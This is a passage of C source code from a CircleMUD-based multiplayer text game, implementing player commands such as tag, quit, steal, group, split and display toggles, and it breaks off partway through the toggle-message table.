/* ************************************************************************
*   File: act.other.c                                   Part of CircleMUD *
*  Usage: Miscellaneous player-level commands                             *
*                                                                         *
*  All rights reserved.  See license.doc for complete information.        *
*                                                                         *
*  Copyright (C) 1993, 94 by the Trustees of the Johns Hopkins University *
*  CircleMUD is based on DikuMUD, Copyright (C) 1990, 1991.               *
************************************************************************ */

#include "conf.h"
#include "sysdep.h"

#include <sys/stat.h>

#include "structs.h"
#include "utils.h"
#include "comm.h"
#include "interpreter.h"
#include "handler.h"
#include "db.h"
#include "spells.h"
#include "screen.h"
#include "house.h"
#include "saves.h"

/* extern variables */
extern struct str_app_type str_app[];
extern struct room_data *world;
extern struct descriptor_data *descriptor_list;
extern struct room_data *world;
extern struct dex_skill_type dex_app_skill[];
extern struct spell_info_type spell_info[];
extern struct index_data *mob_index;
extern char *class_abbrevs[];
extern char *race_abbrevs[];
extern struct title_type titles[NUM_CLASSES][LVL_SIMP + 1];
extern int group_limit;
extern sh_int r_mortal_start_room;
extern int guild_info[][3];

/* extern procedures */
SPECIAL(shop_keeper);
void do_start(struct char_data * ch);
void arrange_stats(struct char_data *ch, int class);
int valid_race(int race, int class);
void perform_drop_gold(struct char_data *ch, int amount, byte mode, sh_int RDR);

ACMD(do_tag)
{
  struct char_data *vict;

  one_argument(argument, buf);
  if (!*buf) {
    send_to_char("You gonna tag SOMEONE??\r\n", ch);
    return;
  }
  if (!(vict = get_char_room_vis(ch, buf))) {
      send_to_char("No one by that name here...\r\n", ch);
      return;
  }   
  if (IS_NPC(vict)) {
    send_to_char("I don't think it's interested in playing tag..\r\n", ch);
    return;
  }
  if (vict == ch) {
    send_to_char("That's no fun!\r\n", ch);
    return;
  }
  if (GET_LEVEL(vict) <= 10) {
    send_to_char("Don't pick on a newbie!\r\n", ch);
    return;
  }
  if (PLR_FLAGGED(vict, PLR_AUTOBOT)) {
    send_to_char("Trying to ruin the game of tag, eh?  Sheesh! Party pooper!\r\n",
                 ch);
    return;
  }
  if (ch->player_specials->taggedby == GET_IDNUM(vict)) {
    send_to_char("You can't tag them!  They just tagged you!\r\n", ch);
    return;
  }
  if (PLR_FLAGGED(ch, PLR_TAGGED)) {
    REMOVE_BIT(PLR_FLAGS(ch), PLR_TAGGED);
    SET_BIT(PLR_FLAGS(vict), PLR_TAGGED); 
    vict->player_specials->taggedby = GET_IDNUM(ch);
    ch->player_specials->taggedby = NOBODY;
    act("You tag $N, $E's IT!", FALSE, ch, 0, vict, TO_CHAR); 
    act("$n tags $N.  Run $E's IT!", FALSE, ch, 0, vict, TO_NOTVICT);
    act("You are tagged by $n, you're IT!", FALSE, ch, 0, vict, TO_VICT);
  }
}


ACMD(do_quit)
{
  void die(struct char_data * ch);
  /*void Crash_rentsave(struct char_data * ch, int cost);*/
  /*extern int free_rent;*/
  int save_room;
  struct descriptor_data *d, *next_d;

  if (IS_NPC(ch) || !ch->desc)
    return;

  if (subcmd != SCMD_QUIT)
    send_to_char("You have to type quit--no less, to quit!\r\n", ch);
  else if (GET_POS(ch) == POS_FIGHTING)
    send_to_char("No way!  You're fighting for your life!\r\n", ch);
  else if (GET_POS(ch) < POS_STUNNED) {
    send_to_char("You die before your time...\r\n", ch);
    die(ch);
  } else {
    if (GET_PCHAN(ch) == GET_IDNUM(ch)) 
      command_interpreter(ch, "pchan close");
    if (!GET_INVIS_LEV(ch))
      act("$n has left the game.", TRUE, ch, 0, 0, TO_ROOM);
    sprintf(buf, "%s has quit the game.", GET_NAME(ch));
    mudlog(buf, NRM, MAX(LVL_IMMORT, GET_INVIS_LEV(ch)), TRUE);
    send_to_char("Goodbye, friend.. Come back soon!\r\n", ch);
    /*    KAKO    */
    if (PLR_FLAGGED(ch, PLR_AFK))
        REMOVE_BIT(PLR_FLAGS(ch), PLR_AFK);
    SET_BIT(PLR_FLAGS(ch), PLR_LOADROOM);
    if (GET_LEVEL(ch) < LVL_IMMORT)
      GET_LOADROOM(ch) = world[ch->in_room].number;

    /*
     * kill off all sockets connected to the same player as the one who is
     * trying to quit.  Helps to maintain sanity as well as prevent duping.
     */
    for (d = descriptor_list; d; d = next_d) {
      next_d = d->next;
      if (d == ch->desc)
        continue;
      if (d->character && (GET_IDNUM(d->character) == GET_IDNUM(ch)))
        close_socket(d);
    }

   save_room = ch->in_room;
   /*if (free_rent)
      Crash_rentsave(ch, 0);*/
    save_rent(ch);
    ch->quitting = TRUE;
    extract_char(ch);		/* Char is saved in extract char */

    /* If someone is quitting in their house, let them load back here */
    if (ROOM_FLAGGED(save_room, ROOM_HOUSE))
      save_char(ch, save_room);
  }
}



ACMD(do_save)
{
  if (IS_NPC(ch) || !ch->desc)
    return;

  if (cmd) {
    sprintf(buf, "Saving %s.\r\n", GET_NAME(ch));
    send_to_char(buf, ch);
  }
  write_saves(ch);  /* Save information not in playerfile */
  save_char(ch, NOWHERE);
  if (GET_LEVEL(ch) < LVL_IMMORT)
    GET_LOADROOM(ch) = world[ch->in_room].number;
  /*Crash_crashsave(ch);*/
  if (ROOM_FLAGGED(ch->in_room, ROOM_HOUSE_CRASH))
    House_crashsave(world[ch->in_room].number);
  save_rent(ch);
}


/* generic function for commands which are normally overridden by
   special procedures - i.e., shop commands, mail commands, etc. */
ACMD(do_not_here)
{
  send_to_char("Sorry, but you cannot do that here!\r\n", ch);
}



ACMD(do_sneak)
{
  struct affected_type af;
  byte percent;

sprintf(buf1, "Okay, you'll try to move silently for a while.\r\n");
sprintf(buf2, "Okay, you stop your sneaking about.\r\n");

if (AFF_FLAGGED(ch, AFF_SNEAK)) {
  TOGGLE_BIT(AFF_FLAGS(ch), AFF_SNEAK);
  send_to_char(IS_AFFECTED(ch, AFF_SNEAK) ? buf1 : buf2, ch);
  return;
} else { 
  send_to_char(buf1, ch);
  if (IS_AFFECTED(ch, AFF_SNEAK))
    affect_from_char(ch, SKILL_SNEAK);

  percent = number(1, 101);	/* 101% is a complete failure */
  if (!(GET_RACE(ch) == RACE_TROLL || GET_RACE(ch) == RACE_HOBBIT ||
      GET_RACE(ch) == RACE_ELF) && (percent > GET_SKILL(ch, SKILL_SNEAK) + dex_app_skill[GET_DEX(ch)].sneak))
    return;

  af.type = SKILL_SNEAK;
  af.duration = GET_LEVEL(ch);
  af.modifier = 0;
  af.location = APPLY_NONE;
  af.bitvector = AFF_SNEAK;
  affect_to_char(ch, &af);
 }
}



ACMD(do_hide)
{
  byte percent;

  send_to_char("You attempt to hide yourself.\r\n", ch);

  if (IS_AFFECTED(ch, AFF_HIDE))
    REMOVE_BIT(AFF_FLAGS(ch), AFF_HIDE);

  percent = number(1, 101);	/* 101% is a complete failure */
  if(GET_RACE(ch) == RACE_HOBBIT)
    percent -= 10; /* racial modifiers for hide - Treb 9/96 */

  if (percent > GET_SKILL(ch, SKILL_HIDE) + dex_app_skill[GET_DEX(ch)].hide)
    return;

  SET_BIT(AFF_FLAGS(ch), AFF_HIDE);
}




ACMD(do_steal)
{
  struct char_data *vict;
  struct obj_data *obj;
  char vict_name[MAX_INPUT_LENGTH], obj_name[MAX_INPUT_LENGTH];
  int percent, gold, eq_pos, pcsteal = 0, ohoh = 0;
  extern int pt_allowed;


  ACMD(do_gen_comm);

  argument = one_argument(argument, obj_name);
  one_argument(argument, vict_name);

  if (!(vict = get_char_room_vis(ch, vict_name))) {
    send_to_char("Steal what from who?\r\n", ch);
    return;
  } else if (vict == ch) {
    send_to_char("Come on now, that's rather stupid!\r\n", ch);
    return;
  }

  /* 101% is a complete failure */
  percent = number(1, 101) - dex_app_skill[GET_DEX(ch)].p_pocket;
  if(GET_RACE(ch) == RACE_HOBBIT)
    percent -= 10; /* racial modifiers for steal - Treb 9/96 */
  if (GET_POS(vict) < POS_SLEEPING)
    percent = -1;		/* ALWAYS SUCCESS */

  if (!pt_allowed) {
    if (!IS_NPC(vict) && !PLR_FLAGGED(vict, PLR_THIEF) 
        && !ROOM_FLAGGED(vict->in_room, ROOM_CRIMEOK) &&
	!PLR_FLAGGED(vict, PLR_KILLER) && !PLR_FLAGGED(ch, PLR_THIEF)) {
      
        SET_BIT(PLR_FLAGS(ch), PLR_THIEF);
        send_to_char("Okay, you're the boss... you're now a THIEF!\r\n",ch); 
        sprintf(buf, "PC Thief bit set on %s for stealing from %s", 
                GET_NAME(ch), GET_NAME(vict)); 
        mudlog(buf, BRF, LVL_IMMORT, TRUE);
       
      pcsteal = 1;
    }
    if (PLR_FLAGGED(ch, PLR_THIEF))
      pcsteal = 1;
  }
  /* NO NO With Imp's and Shopkeepers, and if player thieving is not allowed */
  if (GET_LEVEL(vict) >= LVL_IMMORT || pcsteal ||
      GET_MOB_SPEC(vict) == shop_keeper)
    percent = 101;		/* Failure */

  if (str_cmp(obj_name, "coins") && str_cmp(obj_name, "gold")) {

    if (!(obj = get_obj_in_list_vis(vict, obj_name, vict->carrying))) {

      for (eq_pos = 0; eq_pos < NUM_WEARS; eq_pos++)
	if (GET_EQ(vict, eq_pos) &&
	    (isname(obj_name, GET_EQ(vict, eq_pos)->name)) &&
	    CAN_SEE_OBJ(ch, GET_EQ(vict, eq_pos))) {
	  obj = GET_EQ(vict, eq_pos);
	  break;
	}
      if (!obj) {
	act("$E hasn't got that item.", FALSE, ch, 0, vict, TO_CHAR);
	return;
      } else {			/* It is equipment */
	if (1 || (GET_POS(vict) > POS_SLEEPING)) { /* can steal eq if asleep */
	  send_to_char("Steal the equipment now?  Impossible!\r\n", ch);
	  return;
	} else {
	  act("You unequip $p and steal it.", FALSE, ch, obj, 0, TO_CHAR);
	  act("$n steals $p from $N.", FALSE, ch, obj, vict, TO_NOTVICT);
	  obj_to_char(unequip_char(vict, eq_pos), ch);
	}
      }
    } else {			/* obj found in inventory */

      percent += GET_OBJ_WEIGHT(obj);	/* Make heavy harder */

      if (AWAKE(vict) && (percent > GET_SKILL(ch, SKILL_STEAL))) {
	ohoh = TRUE;
	act("Oops..", FALSE, ch, 0, 0, TO_CHAR);
	act("$n tried to steal something from you!", FALSE, ch, 0, vict, TO_VICT);
	act("$n tries to steal something from $N.", TRUE, ch, 0, vict, TO_NOTVICT);
      } else {			/* Steal the item */
	if ((IS_CARRYING_N(ch) + 1 < CAN_CARRY_N(ch))) {
	  if ((IS_CARRYING_W(ch) + GET_OBJ_WEIGHT(obj)) < CAN_CARRY_W(ch)) {
	    obj_from_char(obj);
	    obj_to_char(obj, ch);
	    send_to_char("Got it!\r\n", ch);
	  }
	} else
	  send_to_char("You cannot carry that much.\r\n", ch);
      }
    }
  } else {			/* Steal some coins */
    if (AWAKE(vict) && (percent > GET_SKILL(ch, SKILL_STEAL))) {
      ohoh = TRUE;
      act("Oops..", FALSE, ch, 0, 0, TO_CHAR);
      act("You discover that $n has $s hands in your wallet.", FALSE, ch, 0, vict, TO_VICT);
      act("$n tries to steal gold from $N.", TRUE, ch, 0, vict, TO_NOTVICT);
    } else {
      /* Steal some gold coins */
      gold = (int) ((GET_GOLD(vict) * number(1, 10)) / 100);
      gold = MIN(1782, gold);
      if (gold > 0) {
	GET_GOLD(ch) += gold;
	GET_GOLD(vict) -= gold;
	sprintf(buf, "Bingo!  You got %d gold coins.\r\n", gold);
	send_to_char(buf, ch);
      } else {
	send_to_char("You couldn't get any gold...\r\n", ch);
      }
    }
  }

  if (ohoh && IS_NPC(vict) && AWAKE(vict))
    hit(vict, ch, TYPE_UNDEFINED);
}



ACMD(do_practice)
{
struct char_data *vict;
  void list_skills(struct char_data * ch, struct char_data * vict);

  one_argument(argument, arg);

  if (*arg) {
    if(GET_LEVEL(ch) >= LVL_IMMORT) {
      if(!(vict = get_char_vis(ch, arg))) {
	send_to_char(NOPERSON, ch);
	return;
      }
    list_skills(ch, vict);
    return;
    }
    send_to_char("You can only practice skills in your guild.\r\n", ch);
  }
  else
    list_skills(ch, NULL);
}



ACMD(do_visible)
{
  void appear(struct char_data * ch);
  void perform_immort_vis(struct char_data *ch);

  if (GET_LEVEL(ch) >= LVL_IMMORT) {
    perform_immort_vis(ch);
    return;
  }

  if IS_AFFECTED(ch, AFF_INVISIBLE) {
    appear(ch);
    send_to_char("You break the spell of invisibility.\r\n", ch);
  } else
    send_to_char("You are already visible.\r\n", ch);
}



ACMD(do_title)
{
  skip_spaces(&argument);
  delete_doubledollar(argument);

  if (IS_NPC(ch))
    send_to_char("Your title is fine... go away.\r\n", ch);
  else if (PLR_FLAGGED(ch, PLR_NOTITLE))
    send_to_char("You can't title yourself -- you shouldn't have abused it!\r\n", ch);
  else if (strstr(argument, "(") || strstr(argument, ")"))
    send_to_char("Titles can't contain the ( or ) characters.\r\n", ch);
  else if (!strcmp(argument, "-default")) {
    set_title(ch, READ_TITLE(ch));
    send_to_char("You now have the default title for your class at this level.\r\n", ch);
  } else if (strlen(argument) > MAX_TITLE_LENGTH) {
    sprintf(buf, "Sorry, titles can't be longer than %d characters.\r\n",
	    MAX_TITLE_LENGTH);
    send_to_char(buf, ch);
  } else {
    set_title(ch, argument);
    sprintf(buf, "Okay, you're now %s %s.\r\n", GET_NAME(ch), GET_TITLE(ch));
    send_to_char(buf, ch);
  }
}


int perform_group(struct char_data *ch, struct char_data *vict)
{
  if (IS_AFFECTED(vict, AFF_GROUP) || !CAN_SEE(ch, vict))
    return 0;

  SET_BIT(AFF_FLAGS(vict), AFF_GROUP);
  if (ch != vict)
    act("$N is now a member of your group.", FALSE, ch, 0, vict, TO_CHAR);
  act("You are now a member of $n's group.", FALSE, ch, 0, vict, TO_VICT);
  act("$N is now a member of $n's group.", FALSE, ch, 0, vict, TO_NOTVICT);
  return 1;
}


void print_group(struct char_data *ch)
{
  struct char_data *k;
  struct follow_type *f;

  if (!IS_AFFECTED(ch, AFF_GROUP))
    send_to_char("But you are not the member of a group!\r\n", ch);
  else {
    send_to_char("Your group consists of:\r\n", ch);

    k = (ch->master ? ch->master : ch);

    if (IS_AFFECTED(k, AFF_GROUP)) {
      sprintf(buf, "     [%4dH %4dM %4dV %7dX] [%2d %s-%s] $N (Head of group)",
	      GET_HIT(k), GET_MANA(k), GET_MOVE(k), 
	      (titles[(int) GET_CLASS(k)][GET_LEVEL(k) + 1].exp) - GET_EXP(k),
	      GET_LEVEL(k), RACE_ABBR(k),
              CLASS_ABBR(k));
      act(buf, FALSE, ch, 0, k, TO_CHAR|TO_SLEEP);
    }

    for (f = k->followers; f; f = f->next) {
      if (!IS_AFFECTED(f->follower, AFF_GROUP))
	continue;

      sprintf(buf, "     [%4dH %4dM %4dV %7dX] [%2d %s-%s] $N", GET_HIT(f->follower),
	      GET_MANA(f->follower), GET_MOVE(f->follower),
	      (titles[(int) GET_CLASS(f->follower)][GET_LEVEL(f->follower) + 1].exp) - GET_EXP(f->follower),

	      GET_LEVEL(f->follower), RACE_ABBR(f->follower), CLASS_ABBR(f->follower));
      act(buf, FALSE, ch, 0, f->follower, TO_CHAR|TO_SLEEP);
    }
  }
}



ACMD(do_group)
{
  struct char_data *vict;
  struct follow_type *f;
  int found;

  one_argument(argument, buf);

  if (!*buf) {
    print_group(ch);
    return;
  }

  if (ch->master) {
    act("You can not enroll group members without being head of a group.",
	FALSE, ch, 0, 0, TO_CHAR);
    return;
  }

  if (!str_cmp(buf, "all")) {
    perform_group(ch, ch);
    for (found = 0, f = ch->followers; f; f = f->next)
      found += perform_group(ch, f->follower);
    if (!found)
      send_to_char("Everyone following you is already in your group.\r\n", ch);
    return;
  }

  if (!(vict = get_char_room_vis(ch, buf)))
    send_to_char(NOPERSON, ch);
  else if ((vict->master != ch) && (vict != ch))
    act("$N must follow you to enter your group.", FALSE, ch, 0, vict, TO_CHAR);
  else {
    if (!IS_AFFECTED(vict, AFF_GROUP))
      perform_group(ch, vict);
    else {
      if (ch != vict)
	act("$N is no longer a member of your group.", FALSE, ch, 0, vict, TO_CHAR);
      act("You have been kicked out of $n's group!", FALSE, ch, 0, vict, TO_VICT);
      act("$N has been kicked out of $n's group!", FALSE, ch, 0, vict, TO_NOTVICT);
      REMOVE_BIT(AFF_FLAGS(vict), AFF_GROUP);
    }
  }
}



ACMD(do_ungroup)
{
  struct follow_type *f, *next_fol;
  struct char_data *tch;
  void stop_follower(struct char_data * ch);

  one_argument(argument, buf);

  if (!*buf) {
    if (ch->master || !(IS_AFFECTED(ch, AFF_GROUP))) {
      send_to_char("But you lead no group!\r\n", ch);
      return;
    }
    sprintf(buf2, "%s has disbanded the group.\r\n", GET_NAME(ch));
    for (f = ch->followers; f; f = next_fol) {
      next_fol = f->next;
      if ((IS_AFFECTED(f->follower, AFF_GROUP)) && 
(!MOB_FLAGGED(f->follower, MOB_FAMILIAR))) {
	REMOVE_BIT(AFF_FLAGS(f->follower), AFF_GROUP);
	send_to_char(buf2, f->follower);
        if (!IS_AFFECTED(f->follower, AFF_CHARM))
	  stop_follower(f->follower);
      }
    }

    REMOVE_BIT(AFF_FLAGS(ch), AFF_GROUP);
    send_to_char("You disband the group.\r\n", ch);
    return;
  }
  if (!(tch = get_char_room_vis(ch, buf))) {
    send_to_char("There is no such person!\r\n", ch);
    return;
  }
  if (tch->master != ch) {
    send_to_char("That person is not following you!\r\n", ch);
    return;
  }

  if (!IS_AFFECTED(tch, AFF_GROUP)) {
    send_to_char("That person isn't in your group.\r\n", ch);
    return;
  }

  REMOVE_BIT(AFF_FLAGS(tch), AFF_GROUP);

  act("$N is no longer a member of your group.", FALSE, ch, 0, tch, TO_CHAR);
  act("You have been kicked out of $n's group!", FALSE, ch, 0, tch, TO_VICT);
  act("$N has been kicked out of $n's group!", FALSE, ch, 0, tch, TO_NOTVICT);
 
  if (!IS_AFFECTED(tch, AFF_CHARM))
    stop_follower(tch);
}




ACMD(do_report)
{
  struct char_data *k;
  struct follow_type *f;

  if (!IS_AFFECTED(ch, AFF_GROUP)) {
    send_to_char("But you are not a member of any group!\r\n", ch);
    return;
  }
  sprintf(buf, "%s reports: %d/%dH, %d/%dM, %d/%dV\r\n",
	  GET_NAME(ch), GET_HIT(ch), GET_MAX_HIT(ch),
	  GET_MANA(ch), GET_MAX_MANA(ch),
	  GET_MOVE(ch), GET_MAX_MOVE(ch));

  CAP(buf);

  k = (ch->master ? ch->master : ch);

  for (f = k->followers; f; f = f->next)
    if (IS_AFFECTED(f->follower, AFF_GROUP) && f->follower != ch)
      send_to_char(buf, f->follower);
  if (k != ch)
    send_to_char(buf, k);
  send_to_char("You report to the group.\r\n", ch);
}



ACMD(do_split)
{
  int amount, num, share;
  struct char_data *k;
  struct follow_type *f;
  extern sh_int donation_room_1;

  if (IS_NPC(ch))
    return;

  one_argument(argument, buf);

  if (is_number(buf)) {
    amount = atoi(buf);
    if (amount <= 0) {
      send_to_char("Sorry, you can't do that.\r\n", ch);
      return;
    }
    if (amount > GET_GOLD(ch)) {
      send_to_char("You don't seem to have that much gold to split.\r\n", ch);
      return;
    }
    k = (ch->master ? ch->master : ch);

    if (IS_AFFECTED(k, AFF_GROUP) && (k->in_room == ch->in_room))
      num = 1;
    else
      num = 0;

    for (f = k->followers; f; f = f->next)
      if (IS_AFFECTED(f->follower, AFF_GROUP) &&
	  (!IS_NPC(f->follower)) &&
	  (f->follower->in_room == ch->in_room))
	num++;

    if (num && IS_AFFECTED(ch, AFF_GROUP))
      share = amount / num;
    else {
      send_to_char("With whom do you wish to share your gold?\r\n", ch);
      return;
    }

    GET_GOLD(ch) -= share * (num - 1);

    if (IS_AFFECTED(k, AFF_GROUP) && (k->in_room == ch->in_room)
	&& !(IS_NPC(k)) && k != ch) {
      GET_GOLD(k) += share;
      sprintf(buf, "%s splits %d coins; you receive %d.\r\n", GET_NAME(ch),
	      amount, share);
      send_to_char(buf, k);
    }
    for (f = k->followers; f; f = f->next) {
      if (IS_AFFECTED(f->follower, AFF_GROUP) &&
	  (!IS_NPC(f->follower)) &&
	  (f->follower->in_room == ch->in_room) &&
	  f->follower != ch) {
	GET_GOLD(f->follower) += share;
	sprintf(buf, "%s splits %d coins; you receive %d.\r\n", GET_NAME(ch),
		amount, share);
	send_to_char(buf, f->follower);
        if (IS_MONK(f->follower)) {
          if (GET_GOLD(f->follower) > (GET_LEVEL(ch) * 1000)) {
            sprintf(buf, "To attempt to continue your life of poverty.\r\n");
            send_to_char(buf, f->follower);
            perform_drop_gold(ch, (GET_GOLD(f->follower) - 
                 (GET_LEVEL(f->follower) * 1000)), SCMD_DONATE, 
                  real_room(donation_room_1));
          }
        }
      }
    }
    sprintf(buf, "You split %d coins among %d members -- %d coins each.\r\n",
	    amount, num, share);
    send_to_char(buf, ch);
  } else {
    send_to_char("How many coins do you wish to split with your group?\r\n", ch);
    return;
  }
}



ACMD(do_use)
{
  struct obj_data *mag_item;
  int equipped = 1;

  half_chop(argument, arg, buf);
  if (!*arg) {
    sprintf(buf2, "What do you want to %s?\r\n", CMD_NAME);
    send_to_char(buf2, ch);
    return;
  }
  mag_item = GET_EQ(ch, WEAR_HOLD);

  if (!mag_item || !isname(arg, mag_item->name)) {
    switch (subcmd) {
    case SCMD_RECITE:
    case SCMD_QUAFF:
      equipped = 0;
      if (!(mag_item = get_obj_in_list_vis(ch, arg, ch->carrying))) {
	sprintf(buf2, "You don't seem to have %s %s.\r\n", AN(arg), arg);
	send_to_char(buf2, ch);
	return;
      }
      break;
    case SCMD_USE:
      sprintf(buf2, "You don't seem to be holding %s %s.\r\n", AN(arg), arg);
      send_to_char(buf2, ch);
      return;
      break;
    default:
      nmlog("SYSERR: Unknown subcmd passed to do_use");
      return;
      break;
    }
  }
  switch (subcmd) {
  case SCMD_QUAFF:
    if (GET_OBJ_TYPE(mag_item) != ITEM_POTION) {
      send_to_char("You can only quaff potions.", ch);
      return;
    }
    break;
  case SCMD_RECITE:
    if (GET_OBJ_TYPE(mag_item) != ITEM_SCROLL) {
      send_to_char("You can only recite scrolls.", ch);
      return;
    }
    break;
  case SCMD_USE:
    if ((GET_OBJ_TYPE(mag_item) != ITEM_WAND) &&
	(GET_OBJ_TYPE(mag_item) != ITEM_STAFF)) {
      send_to_char("You can't seem to figure out how to use it.\r\n", ch);
      return;
    }
    break;
  }

  mag_objectmagic(ch, mag_item, buf);
}



ACMD(do_wimpy)
{
  int wimp_lev;

  one_argument(argument, arg);

  if (!*arg) {
    if (GET_WIMP_LEV(ch)) {
      sprintf(buf, "Your current wimp level is %d hit points.\r\n",
	      GET_WIMP_LEV(ch));
      send_to_char(buf, ch);
      return;
    } else {
      send_to_char("At the moment, you're not a wimp.  (sure, sure...)\r\n", ch);
      return;
    }
  }
  if (isdigit(*arg)) {
    if ((wimp_lev = atoi(arg))) {
      if (wimp_lev < 0)
	send_to_char("Heh, heh, heh.. we are jolly funny today, eh?\r\n", ch);
      else if (wimp_lev > GET_MAX_HIT(ch))
	send_to_char("That doesn't make much sense, now does it?\r\n", ch);
      else if (wimp_lev > (GET_MAX_HIT(ch) >> 1))
	send_to_char("You can't set your wimp level above half your hit points.\r\n", ch);
      else {
	sprintf(buf, "Okay, you'll wimp out if you drop below %d hit points.\r\n",
		wimp_lev);
	send_to_char(buf, ch);
	GET_WIMP_LEV(ch) = wimp_lev;
      }
    } else {
      send_to_char("Okay, you'll now tough out fights to the bitter end.\r\n", ch);
      GET_WIMP_LEV(ch) = 0;
    }
  } else
    send_to_char("Specify at how many hit points you want to wimp out at.  (0 to disable)\r\n", ch);

  return;

}


ACMD(do_display)
{
  int i;
  int mode = 1;

  if (IS_NPC(ch)) {
    send_to_char("Mosters don't need displays.  Go away.\r\n", ch);
    return;
  }
  skip_spaces(&argument);

  if (!*argument) {
    send_to_char("Usage: prompt { A | H | M | T | V | E | all | none }\r\n", ch);
    return;
  }
  if ((!str_cmp(argument, "on")) || (!str_cmp(argument, "all"))) {
    SET_BIT(PRF_FLAGS(ch), PRF_DISPHP | PRF_DISPMANA | 
PRF_DISPMOBHP | PRF_DISPMOVE | PRF_DISPALIGN | PRF_DISPTOGO);
    if (GET_LEVEL(ch) >= LVL_IMMORT) SET_BIT(PRF2_FLAGS(ch), PRF2_DISPROOM);
    SET_BIT(PRF2_FLAGS(ch), PRF2_DISPTIME);
  } else {

    for (i = 0; i < strlen(argument); i++) {
      switch (LOWER(argument[i])) {
      case 'a':
        if (mode == 0)
        REMOVE_BIT(PRF_FLAGS(ch), PRF_DISPALIGN);
	else
	SET_BIT(PRF_FLAGS(ch), PRF_DISPALIGN);
	break;
      case 'h':
        if (mode == 0)
        REMOVE_BIT(PRF_FLAGS(ch), PRF_DISPHP);
	else
	SET_BIT(PRF_FLAGS(ch), PRF_DISPHP);
	break;
      case 'm':
        if (mode == 0)
        REMOVE_BIT(PRF_FLAGS(ch), PRF_DISPMANA);
	else
	SET_BIT(PRF_FLAGS(ch), PRF_DISPMANA);
	break;
      case 'e':
        if (mode == 0)
        REMOVE_BIT(PRF_FLAGS(ch), PRF_DISPMOBHP);
        else
        SET_BIT(PRF_FLAGS(ch), PRF_DISPMOBHP);
        break;
      case 'v':
        if (mode ==0)
        REMOVE_BIT(PRF_FLAGS(ch), PRF_DISPMOVE);
	else
	SET_BIT(PRF_FLAGS(ch), PRF_DISPMOVE);
	break;
      case 't':
        if (mode ==0)
        REMOVE_BIT(PRF_FLAGS(ch), PRF_DISPTOGO);
        else
        SET_BIT(PRF_FLAGS(ch), PRF_DISPTOGO);
        break;
      case 'r':
        if (GET_LEVEL(ch) >= LVL_IMMORT)
        if (mode ==0)
        REMOVE_BIT(PRF2_FLAGS(ch), PRF2_DISPROOM);
        else  
          SET_BIT(PRF2_FLAGS(ch), PRF2_DISPROOM);
        break;
      case 'c':
        if (mode == 0)
        REMOVE_BIT(PRF2_FLAGS(ch), PRF2_DISPTIME);
        else
        SET_BIT(PRF2_FLAGS(ch), PRF2_DISPTIME);
        break;
      case '+':
        mode = 1;
        break;
      case '-':
        mode = 0;
        break;
      case '=':
        mode = 1;
        REMOVE_BIT(PRF_FLAGS(ch), PRF_DISPHP | PRF_DISPMANA | PRF_DISPMOBHP |
                   PRF_DISPMOVE | PRF_DISPALIGN | PRF_DISPTOGO);
        REMOVE_BIT(PRF2_FLAGS(ch), PRF2_DISPROOM | PRF2_DISPTIME);
        break;
      }
    }
  }

  send_to_char(OK, ch);
}



ACMD(do_gen_write)
{
  FILE *fl;
  char *tmp, *filename, buf[MAX_STRING_LENGTH];
  struct stat fbuf;
  extern int max_filesize;
  time_t ct;

  switch (subcmd) {
  case SCMD_BUG:
    filename = BUG_FILE;
    break;
  case SCMD_TYPO:
    filename = TYPO_FILE;
    break;
  case SCMD_IDEA:
    filename = IDEA_FILE;
    break;
  default:
    return;
  }

  ct = time(0);
  tmp = asctime(localtime(&ct));

  if (IS_NPC(ch)) {
    send_to_char("Monsters can't have ideas - Go away.\r\n", ch);
    return;
  }

  skip_spaces(&argument);
  delete_doubledollar(argument);

  if (!*argument) {
    send_to_char("That must be a mistake...\r\n", ch);
    return;
  }
  sprintf(buf, "%s %s: %s", GET_NAME(ch), CMD_NAME, argument);
  mudlog(buf, CMP, LVL_IMMORT, FALSE);

  if (stat(filename, &fbuf) < 0) {
    perror("Error statting file");
    return;
  }
  if (fbuf.st_size >= max_filesize) {
    send_to_char("Sorry, the file is full right now.. try again later.\r\n", ch);
    return;
  }
  if (!(fl = fopen(filename, "a"))) {
    perror("do_gen_write");
    send_to_char("Could not open the file.  Sorry.\r\n", ch);
    return;
  }
  fprintf(fl, "%-8s (%6.6s) [%5d] %s\n", GET_NAME(ch), (tmp + 4),
	  world[ch->in_room].number, argument);
  fclose(fl);
  send_to_char("Okay.  Thanks!\r\n", ch);
}



#define TOG_OFF 0
#define TOG_ON  1

#define PRF_TOG_CHK(ch,flag) ((TOGGLE_BIT(PRF_FLAGS(ch), (flag))) & (flag))
#define PRF2_TOG_CHK(ch,flag) ((TOGGLE_BIT(PRF2_FLAGS(ch), (flag))) & (flag))

ACMD(do_gen_tog)
{
  long result;
  extern int nameserver_is_slow;

  char *tog_messages[][2] = {
    {"You are now safe from summoning by other players.\r\n",
    "You may now be summoned by other players.\r\n"},
    {"Nohassle disabled.\r\n",
    "Nohassle enabled.\r\n"},
    {"Brief mode off.\r\n",
    "Brief mode on.\r\n"},
    {"Compact mode off.\r\n",
    "Compact mode on.\r\n"},
    {"You can now hear tells.\r\n",
    "You are now deaf to tells.\r\n"},
    {"You can now hear auctions.\r\n",
    "You are now deaf to auctions.\r\n"},
    {"You can now hear shouts.\r\n",
    "You are now deaf to shouts.\r\n"},
    {"You can now hear gossip.\r\n",
    "You are now deaf to gossip.\r\n"},
    {"You can now hear the congratulation messages.\r\n",
    "You are now deaf to the congratulation messages.\r\n"},
    {"You can now hear the Wiz-channel.\r\n",
    "You are now deaf to the Wiz-channel.\r\n"},
    {"You are no longer part of the Quest.\r\n",
    "Okay, you are part of the Quest!\r\n"},
    {"You will no longer see the room flags.\r\n",
    "You will now see the room flags.\r\n"},
    {"You will now have your communication repeated.\r\n",
    "You will no longer have your communication repeated.\r\n"},
    {"HolyLight mode off.\r\n",
    "HolyLight mode on.\r\n"},
    {"Nameserver_is_slow changed to NO; IP addresses will now be resolved.\r\n",
    "Nameserver_is_slow changed to YES; sitenames will no longer be resolved.\r\n"},
    {"Autoexits disabled.\r\n",
    "Autoexits enabled.\r\n"},
    {"Nohit mode off.\r\n",
    "Nohit mode on.\r\n"},
    {"Darkened.\r\n",
    "Lit up.\r\n"},
    {"You will no longer enter the game invisible.\r\n",
    "You will now enter the game invisible.\r\n"},
    {"Autolooting disabled.\r\n",
    "Autolooting enabled.\r\n"},
    {"You are listening to the clan channel.\r\n",
    "You are no longer listening to the clan channel.\r\n"},
    {"You are listening to your own clan's messages only.\r\n",
     "You are listening to all clan messages.\r\n"},
    {"Autoticking disabled.\r\n",
    "Autoticking enabled.\r\n"},
    {"Autosplit disabled.\r\n",
    "Autosplit enabled.\r\n"},
